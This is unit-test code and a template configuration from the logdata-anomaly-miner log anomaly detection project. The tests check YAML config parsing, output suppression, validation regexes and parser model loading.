context.atomizer_factory.parsing_model.children[0].children[1].repeated_element, OptionalMatchModelElement)) self.assertTrue(isinstance( context.atomizer_factory.parsing_model.children[0].children[1].repeated_element.optional_element, FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[1], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2], ElementValueBranchModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2].value_model, FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2].branch_model_dict['host'], FixedDataModelElement)) # change OptionalModelElement to unknown_model aminer_config.yaml_data['Parser'][1]['args'] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') # change RepeatedElementDataModelElement to unknown_model aminer_config.yaml_data['Parser'][2]['args'][0] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') # change SequenceModelElement to unknown_model aminer_config.yaml_data['Parser'][3]['args'][1] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') # change ElementValueBranchModelElement to unknown_model aminer_config.yaml_data['Parser'][4]['args'][0] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') 
aminer_config.yaml_data['Parser'][4]['branch_model_dict'][0]['model'] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') # change FirstMatchModelElement to unknown_model aminer_config.yaml_data['Parser'][5]['args'][1] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') def test17_demo_yaml_config_equals_python_config(self): """This test checks if the yaml demo config is the same as the python version.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('demo/aminer/demo-config.yml') yml_context = AnalysisContext(aminer_config) yml_context.build_analysis_pipeline() aminer_config = AminerConfig.load_config('demo/aminer/demo-config.py') py_context = AnalysisContext(aminer_config) py_context.build_analysis_pipeline() import copy yml_config_properties = copy.deepcopy(yml_context.aminer_config.config_properties) del yml_config_properties['Parser'] del yml_config_properties['Input'] del yml_config_properties['Analysis'] del yml_config_properties['EventHandlers'] del yml_config_properties['LearnMode'] # remove SimpleUnparsedAtomHandler, VerboseUnparsedAtomHandler and NewMatchPathDetector as they are added by the YamlConfig. 
py_registered_components = copy.copy(py_context.registered_components) del py_registered_components[0] del py_registered_components[1] del py_registered_components[2] del py_registered_components[10] yml_registered_components = copy.copy(yml_context.registered_components) del yml_registered_components[0] del yml_registered_components[1] tmp = {} keys = list(py_registered_components.keys()) for i in range(1, len(py_registered_components)+1): tmp[i] = py_registered_components[keys[i-1]] py_registered_components = tmp py_registered_components_by_name = copy.copy(py_context.registered_components_by_name) del py_registered_components_by_name['SimpleUnparsedHandler'] del py_registered_components_by_name['VerboseUnparsedHandler'] del py_registered_components_by_name['NewMatchPath'] del py_registered_components_by_name['SimpleMonotonicTimestampAdjust'] yml_registered_components_by_name = copy.copy(yml_context.registered_components_by_name) del yml_registered_components_by_name['DefaultNewMatchPathDetector'] del yml_registered_components_by_name['AtomFilter'] self.assertEqual(yml_config_properties, py_context.aminer_config.config_properties) # there actually is no easy way to compare aminer components as they do not implement the __eq__ method. self.assertEqual(len(yml_registered_components), len(py_registered_components)) for i in range(2, len(yml_registered_components)): # skipcq: PTC-W0060 self.assertEqual(type(yml_registered_components[i]), type(py_registered_components[i])) self.assertEqual(yml_registered_components_by_name.keys(), py_registered_components_by_name.keys()) for name in yml_registered_components_by_name.keys(): self.assertEqual(type(yml_registered_components_by_name[name]), type(py_registered_components_by_name[name])) self.assertEqual(len(yml_context.real_time_triggered_components), len(py_context.real_time_triggered_components)) # the atom_handler_list is not equal as the python version uses a SimpleMonotonicTimestampAdjust. 
self.assertEqual(yml_context.atomizer_factory.default_timestamp_path_list, py_context.atomizer_factory.default_timestamp_path_list)
        self.assertEqual(type(yml_context.atomizer_factory.event_handler_list), type(py_context.atomizer_factory.event_handler_list))

    def test18_etd_order(self):
        """Load the template_config and check that the EventTypeDetector is moved to the front of the Analysis list."""
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        aminer_config.load_yaml('unit/data/configfiles/template_config.yml')
        context = AnalysisContext(aminer_config)
        context.build_analysis_pipeline()
        # After build_analysis_pipeline the ETD is expected at index 0, ahead of the detectors that depend on it.
        self.assertEqual(context.aminer_config.yaml_data['Analysis'][0]['type'].name, 'EventTypeDetector')
        self.assertEqual(context.aminer_config.yaml_data['Analysis'][1]['type'].name, 'NewMatchPathValueDetector')
        self.assertEqual(context.aminer_config.yaml_data['Analysis'][2]['type'].name, 'NewMatchPathValueComboDetector')
        self.assertEqual(context.aminer_config.yaml_data['Analysis'][3]['type'].name, 'NewMatchPathValueComboDetector')

    def test19_stream_printer_output_file(self):
        """Check that the output_file_path property of StreamPrinterEventHandler opens the configured file in 'w+' mode."""
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        aminer_config.load_yaml('unit/data/configfiles/template_config.yml')
        context = AnalysisContext(aminer_config)
        context.build_analysis_pipeline()
        # The template config points the printer at a fixed path in the shared /tmp directory. The skipcq marker
        # acknowledges the hardcoded-temp-path lint (BAN-B108) for this test fixture; production configs should
        # prefer a dedicated, non-world-writable output directory.
        self.assertEqual(context.atomizer_factory.event_handler_list[0].stream.name, '/tmp/streamPrinter.txt')  # skipcq: BAN-B108
        self.assertEqual(context.atomizer_factory.event_handler_list[0].stream.mode, 'w+')

    def test20_suppress_output(self):
        """
        Check if the suppress property and SuppressNewMatchPathDetector are working as expected.
This test only includes the StreamPrinterEventHandler. """ __expected_string1 = '%s New path(es) detected\n%s: "%s" (%d lines)\n %s\n%s\n\n' t = time() fixed_dme = FixedDataModelElement('s1', b' pid=') match_context_fixed_dme = MatchContext(b' pid=') match_element_fixed_dme = fixed_dme.get_match_element("", match_context_fixed_dme) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t, 'DefaultNewMatchPathDetector') datetime_format_string = '%Y-%m-%d %H:%M:%S' match_path_s1 = "['/s1']" pid = " pid=" __expected_string2 = '%s New value combination(s) detected\n%s: "%s" (%d lines)\n%s\n\n' fixed_dme2 = FixedDataModelElement('s1', b'25537 uid=') decimal_integer_value_me = DecimalIntegerValueModelElement( 'd1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context_sequence_me = MatchContext(b'25537 uid=2') seq = SequenceModelElement('seq', [fixed_dme2, decimal_integer_value_me]) match_element_sequence_me = seq.get_match_element('first', match_context_sequence_me) string2 = " (b'25537 uid=', 2)\n25537 uid=2" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/suppress_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() context.aminer_config.yaml_data['Analysis'][2]['suppress'] = False context.atomizer_factory.event_handler_list[0].stream = self.output_stream default_nmpd = context.registered_components[3][0] default_nmpd.output_logline = False self.assertTrue(default_nmpd.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), __expected_string1 % ( datetime.fromtimestamp(t).strftime(datetime_format_string), default_nmpd.__class__.__name__, 'DefaultNewMatchPathDetector', 1, match_path_s1, pid)) 
self.reset_output_stream() context.aminer_config.yaml_data['Analysis'][2]['suppress'] = True context = AnalysisContext(aminer_config) context.build_analysis_pipeline() context.atomizer_factory.event_handler_list[0].stream = self.output_stream default_nmpd = context.registered_components[3][0] default_nmpd.output_logline = False self.assertTrue(default_nmpd.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), "") self.reset_output_stream() value_combo_det = context.registered_components[1][0] log_atom_sequence_me = LogAtom(match_element_sequence_me.get_match_string(), ParserMatch(match_element_sequence_me), t, value_combo_det) context.atomizer_factory.event_handler_list[0].stream = self.output_stream self.assertTrue(value_combo_det.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), __expected_string2 % ( datetime.fromtimestamp(t).strftime(datetime_format_string), value_combo_det.__class__.__name__, 'ValueComboDetector', 1, string2)) self.reset_output_stream() context.aminer_config.yaml_data['Analysis'][0]['suppress'] = True context = AnalysisContext(aminer_config) context.build_analysis_pipeline() value_combo_det = context.registered_components[1][0] context.atomizer_factory.event_handler_list[0].stream = self.output_stream self.assertTrue(value_combo_det.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), "") self.reset_output_stream() def test21_suppress_output_no_id_error(self): """Check if an error is raised if no id parameter is defined.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/suppress_config.yml') aminer_config.yaml_data['Analysis'][0]['id'] = None aminer_config.yaml_data['Analysis'][0]['suppress'] = True context = AnalysisContext(aminer_config) 
        self.assertRaises(ValueError, context.build_analysis_pipeline)

    def test22_set_output_handlers(self):
        """
        Check if setting the output_event_handlers is working as expected.

        Loads unit/data/configfiles/template_config.yml and builds the pipeline. Only the component registered under the
        name 'EventTypeDetector' is expected to carry exactly one StreamPrinterEventHandler; every other registered
        component must have output_event_handlers set to None.
        """
        # YamlConfig.py is loaded from the installed package path, not from the source tree.
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        aminer_config.load_yaml('unit/data/configfiles/template_config.yml')
        context = AnalysisContext(aminer_config)
        context.build_analysis_pipeline()
        # registered_components maps an index to a (component, name) pair.
        for index in context.registered_components:
            component = context.registered_components[index]
            if component[1] == 'EventTypeDetector':
                self.assertEqual(1, len(component[0].output_event_handlers))
                self.assertEqual(StreamPrinterEventHandler, type(component[0].output_event_handlers[0]))
            else:
                self.assertEqual(None, component[0].output_event_handlers)

    def test23_check_functionality_of_validate_bigger_than_or_equal(self):
        """
        Check the functionality of the _validate_bigger_than_or_equal procedure.

        bigger_than_or_equal_valid.yml (max_num_vals >= min_num_vals) must load, while bigger_than_or_equal_error.yml
        (max_num_vals < min_num_vals) must be rejected with a ValueError.
        """
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        aminer_config.load_yaml('unit/data/configfiles/bigger_than_or_equal_valid.yml')
        self.assertRaises(ValueError, aminer_config.load_yaml, 'unit/data/configfiles/bigger_than_or_equal_error.yml')

    def test24_check_log_resource_list(self):
        """
        Check the functionality of the regex for LogResourceList.

        wrong_log_resource_list.yml must be rejected with a ValueError.
        """
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        self.assertRaises(ValueError, aminer_config.load_yaml, 'unit/data/configfiles/wrong_log_resource_list.yml')

    def test25_check_mail_regex(self):
        """
        Check the functionality of the regex for MailAlerting.TargetAddress and MailAlerting.FromAddress.

        wrong_email.yml must be rejected, both address keys must share one regex, and that regex must match the whole of
        each valid sample (including a host without a dot, 'root@localhost') while matching nothing in the invalid samples.
        """
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        self.assertRaises(ValueError, aminer_config.load_yaml, 'unit/data/configfiles/wrong_email.yml')
        # The schema file holds a Python expression (it evaluates to a dict), so it is read with eval(). eval() executes the
        # file's contents as code; this is only acceptable because the file is the schema shipped with the installed
        # package, never for content from an untrusted source.
        with open('/usr/lib/logdata-anomaly-miner/aminer/schemas/BaseSchema.py', 'r') as sma:
            # skipcq: PYL-W0123
            base_schema = eval(sma.read())
        self.assertEqual(base_schema['MailAlerting.TargetAddress']['regex'], base_schema['MailAlerting.FromAddress']['regex'])
        target_address_regex = re.compile(base_schema['MailAlerting.TargetAddress']['regex'])
        valid_emails = ['john@example.com', 'john@example.co', 'root@localhost']
        for email in valid_emails:
            # group(0) must equal the input, i.e. the match covers the whole address and not only a substring of it.
            self.assertEqual(target_address_regex.search(email).group(0), email, 'Failed regex check at %s.' % email)
        invalid_emails = ['john_at_example_dot_com', 'john@example.', '@example.com', ' @example.com']
        for email in invalid_emails:
            # search() must find nothing at all, so even a partial match inside the sample counts as a failure.
            self.assertEqual(target_address_regex.search(email), None, 'Failed regex check at %s.' % email)

    def test26_filter_config_errors(self):
        """
        Check if errors in multiple sections like Analysis, Parser and EventHandlers are found and filtered properly.

        filter_config_errors.yml contains unknown attributes at the top level and in the Parser, Analysis and EventHandlers
        sections; the ValueError message must list exactly those. The 'oneof definition N' index is matched with [0-9]+
        rather than a fixed number, so the test does not pin the position of the matching rule inside the schema.
        """
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        try:
            aminer_config.load_yaml('unit/data/configfiles/filter_config_errors.yml')
        except ValueError as e:
            reg = re.compile(
                r"Config-Error: \{'AMinerGroup': \['unknown field'], 'Analysis': \[\{0: \['none or more than one rule validate', \{'oneof "
                r"definition [0-9]+': \[\{'learn_mode': \['unknown field'], 'reset_after_report_flag': \['unknown field'], 'type': \{'"
                r"allowed': \['ParserCount']}}]}]}], 'EventHandlers': \[\{1: \['none or more than one rule validate', \{'oneof definition "
                r"[0-9]+': \[\{'output_file_path': \['unknown field'], 'type': \{'allowed': \['SyslogWriterEventHandler']}}]}]}], 'Parser':"
                r" \[\{0: \['none or more than one rule validate', \{'oneof definition [0-9]+': \[\{'args2': \['unknown field'], 'type': \{"
                r"'forbidden': \['ElementValueBranchModelElement', 'DecimalIntegerValueModelElement', 'DecimalFloatValueModelElement', '"
                r"DateTimeModelElement', 'MultiLocaleDateTimeModelElement', 'DelimitedDataModelElement', 'JsonModelElement',"
                r" 'JsonStringModelElement']}}]}]}]}")
            self.assertIsNotNone(reg.match(str(e)))
        # The try/except above only inspects the message when an error occurs; this call asserts that it is actually raised.
        self.assertRaises(ValueError, aminer_config.load_yaml, 'unit/data/configfiles/filter_config_errors.yml')

    def test27_same_id_analysis(self):
        """
        Check if a ValueError is raised when the same id is used for multiple analysis components.

        same_id_analysis.yml reuses the id "NewMatchPathValueComboDetector"; the error message must name it.
        """
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        try:
            aminer_config.load_yaml('unit/data/configfiles/same_id_analysis.yml')
            context = AnalysisContext(aminer_config)
            context.build_analysis_pipeline()
        except ValueError as e:
            msg = "Config-Error: The id \"NewMatchPathValueComboDetector\" occurred multiple times in Analysis!"
            self.assertEqual(msg, str(e))
        # The duplicate id is expected to surface from build_analysis_pipeline(), so a fresh context is built and that
        # call alone is asserted to raise (the try/except above only checks the message).
        context = AnalysisContext(aminer_config)
        self.assertRaises(ValueError, context.build_analysis_pipeline)

    def test28_same_id_event_handlers(self):
        """
        Check if a ValueError is raised when the same id is used for multiple event handler components.

        same_id_event_handlers.yml reuses the id "handler"; the error message must name it.
        """
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        try:
            aminer_config.load_yaml('unit/data/configfiles/same_id_event_handlers.yml')
            context = AnalysisContext(aminer_config)
            context.build_analysis_pipeline()
        except ValueError as e:
            msg = "Config-Error: The id \"handler\" occurred multiple times in EventHandlers!"
            self.assertEqual(msg, str(e))
        # As in test27: the try/except only checks the message, this asserts that the error is raised at all.
        context = AnalysisContext(aminer_config)
        self.assertRaises(ValueError, context.build_analysis_pipeline)

    def test29_same_id_parser(self):
        """
        Check if a ValueError is raised when the same id is used for multiple parser components.

        same_id_parser.yml reuses the id "apacheModel"; the error message must name it.
        """
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        try:
            aminer_config.load_yaml('unit/data/configfiles/same_id_parser.yml')
            context = AnalysisContext(aminer_config)
            context.build_analysis_pipeline()
        except ValueError as e:
            msg = "Config-Error: The id \"apacheModel\" occurred multiple times in Parser!"
            self.assertEqual(msg, str(e))
        # As in test27: the try/except only checks the message, this asserts that the error is raised at all.
        context = AnalysisContext(aminer_config)
        self.assertRaises(ValueError, context.build_analysis_pipeline)

    def test30_parser_model_files(self):
        """
        Test if parser models from conf-enabled work properly.

        main.yml references the parser models Sub1, Sub2 and Sub3 by type, and Sub2 embeds Sub3 in turn. The test walks the
        resulting FirstMatchModelElement tree and checks the element class and element_id at every position, including
        Sub3 both nested inside Sub2 and used directly.
        """
        spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py')
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        aminer_config.load_yaml('unit/data/configfiles/main.yml')
        context = AnalysisContext(aminer_config)
        context.build_analysis_pipeline()
        pm = context.atomizer_factory.parsing_model
        self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter))
        self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector))
        self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler))
        # main.yml sets Input.timestamp_paths to [""].
        self.assertEqual(context.atomizer_factory.default_timestamp_path_list, [""])
        self.assertTrue(isinstance(pm, FirstMatchModelElement))
        # Sub1
        self.assertTrue(isinstance(pm.children[0], SequenceModelElement))
        self.assertTrue(isinstance(pm.children[0].children[0], FixedDataModelElement))
        self.assertEqual(pm.children[0].children[0].element_id, "fix1")
        self.assertTrue(isinstance(pm.children[0].children[1], DecimalIntegerValueModelElement))
        self.assertEqual(pm.children[0].children[1].element_id, "decimal1")
        # Sub2
        self.assertTrue(isinstance(pm.children[1], SequenceModelElement))
        self.assertTrue(isinstance(pm.children[1].children[0], DecimalIntegerValueModelElement))
        self.assertEqual(pm.children[1].children[0].element_id, "decimal2")
        self.assertTrue(isinstance(pm.children[1].children[1], FixedDataModelElement))
        self.assertEqual(pm.children[1].children[1].element_id, "fix2")
        self.assertTrue(isinstance(pm.children[1].children[2], DecimalFloatValueModelElement))
        self.assertEqual(pm.children[1].children[2].element_id, "decimalFloat2")
        # Sub2 - Sub3 (Sub3 nested inside Sub2)
        self.assertTrue(isinstance(pm.children[1].children[3], FirstMatchModelElement))
        self.assertTrue(isinstance(pm.children[1].children[3].children[0], SequenceModelElement))
        self.assertTrue(isinstance(pm.children[1].children[3].children[0].children[0], FixedDataModelElement))
        self.assertEqual(pm.children[1].children[3].children[0].children[0].element_id, "fix3")
        self.assertTrue(isinstance(pm.children[1].children[3].children[0].children[1], DecimalFloatValueModelElement))
        self.assertEqual(pm.children[1].children[3].children[0].children[1].element_id, "decimalFloat3")
        self.assertTrue(isinstance(pm.children[1].children[3].children[1], AnyByteDataModelElement))
        self.assertEqual(pm.children[1].children[3].children[1].element_id, "any3")
        # Sub3 (used directly from main.yml)
        self.assertTrue(isinstance(pm.children[2], FirstMatchModelElement))
        self.assertTrue(isinstance(pm.children[2].children[0], SequenceModelElement))
        self.assertTrue(isinstance(pm.children[2].children[0].children[0], FixedDataModelElement))
        self.assertEqual(pm.children[2].children[0].children[0].element_id, "fix3")
        self.assertTrue(isinstance(pm.children[2].children[0].children[1], DecimalFloatValueModelElement))
        self.assertEqual(pm.children[2].children[0].children[1].element_id, "decimalFloat3")
        self.assertTrue(isinstance(pm.children[2].children[1], AnyByteDataModelElement))
        self.assertEqual(pm.children[2].children[1].element_id, "any3")
        # ApacheAccessModel
        self.assertEqual(pm.children[3].element_id, "accesslog")

    def run_empty_components_tests(self, context):
        """
        Run the empty components tests.

        Shared helper that asserts the default registered components, the StreamPrinterEventHandler and the access log
        parsing model (a SequenceModelElement with element_id 'accesslog'). It does not build the pipeline itself, so the
        caller must pass a context on which build_analysis_pipeline() has already run. Presumably used by tests whose
        config omits optional sections — confirm against the callers.
        """
        self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter))
        self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector))
        self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler))
        self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/accesslog/time'])
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model, SequenceModelElement))
        # Children in order: host, separator, ident, separator, user, separator, time, ... (checked by class only).
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[1], FixedDataModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2], VariableByteDataModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[3], FixedDataModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[4], VariableByteDataModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[5], FixedDataModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[6], DateTimeModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[7], FixedDataModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[8], FixedWordlistDataModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[9], FixedDataModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[10], VariableByteDataModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[11], FixedDataModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[12], VariableByteDataModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[13], FixedDataModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[14], DecimalIntegerValueModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[15], FixedDataModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[16], DecimalIntegerValueModelElement))
        self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[17], FixedDataModelElement))
self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[18], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[19], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.element_id, 'accesslog') if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/__init__.py000066400000000000000000000000001437606560100247740ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/config.py000066400000000000000000000170061437606560100245200ustar00rootroot00000000000000# This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. 
# config_properties['AnalysisConfigFile'] = 'analysis.py'

# Persistence directory: state shared between multiple aminer invocations
# is stored here. It must be accessible to 'AminerUser' only (no group or
# world read access); aminer refuses to start when that is violated.
# Defaults to '/var/lib/aminer' when left undefined.
#
# Mail alerting: leaving 'MailAlerting.TargetAddress' undefined disables
# the e-mail notification hooks entirely; the remaining keys tune them.
config_properties.update({
    'Core.PersistenceDir': '/tmp/lib/aminer',  # skipcq: BAN-B108
    # Recipient of alert e-mails.
    'MailAlerting.TargetAddress': 'mail@localhost',
    # Sender address; when undefined, the host's "sendmail" implementation
    # decides which sender address to use.
    'MailAlerting.FromAddress': 'mail@localhost',
    # Text prepended to the standard aminer subject line.
    'MailAlerting.SubjectPrefix': 'aminer Alerts:',
    # Seconds after startup before the first alert e-mail may be sent
    # (default 0: any event may trigger alerting immediately).
    'MailAlerting.AlertGraceTime': 0,
    # Seconds to keep collecting events after the first one, so that they
    # go out in a single e-mail (default 10).
    'MailAlerting.EventCollectTime': 10,
    # Minimum seconds between two alert e-mails to avoid spamming; events in
    # between are collected into the next report (default 600).
    'MailAlerting.MinAlertGap': 0,
})

# Define the maximum time between two alert e-mails in seconds.
# When undefined this defaults to "MailAlerting.MinAlertGap".
# Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 # config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct py how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement service_children_disk_upgrade = [ DateTimeModelElement('Date', b'%d.%m.%Y %H:%M:%S'), FixedDataModelElement('UName', b' ubuntu '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('HD Repair', b' System rebooted for hard disk upgrade')] service_children_home_path = [ FixedDataModelElement('Pwd', b'The Path of the home directory shown by pwd of the user '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Is', b' is: '), AnyByteDataModelElement('Path')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('Disk Upgrade', service_children_disk_upgrade), SequenceModelElement('Home Path', service_children_home_path)]) # Some generic imports. 
from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(None) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [atom_filter], anomaly_event_handlers, default_timestamp_path_list=['']) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler atom_filter.add_handler(SimpleUnparsedAtomHandler(anomaly_event_handlers), stop_when_handled_flag=True) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name=None) atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/Home Path/Username', '/model/Home Path/Path'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name=None) atom_filter.add_handler(new_match_path_value_combo_detector) # Include the e-mail notification handler only if the configuration parameter was set. 
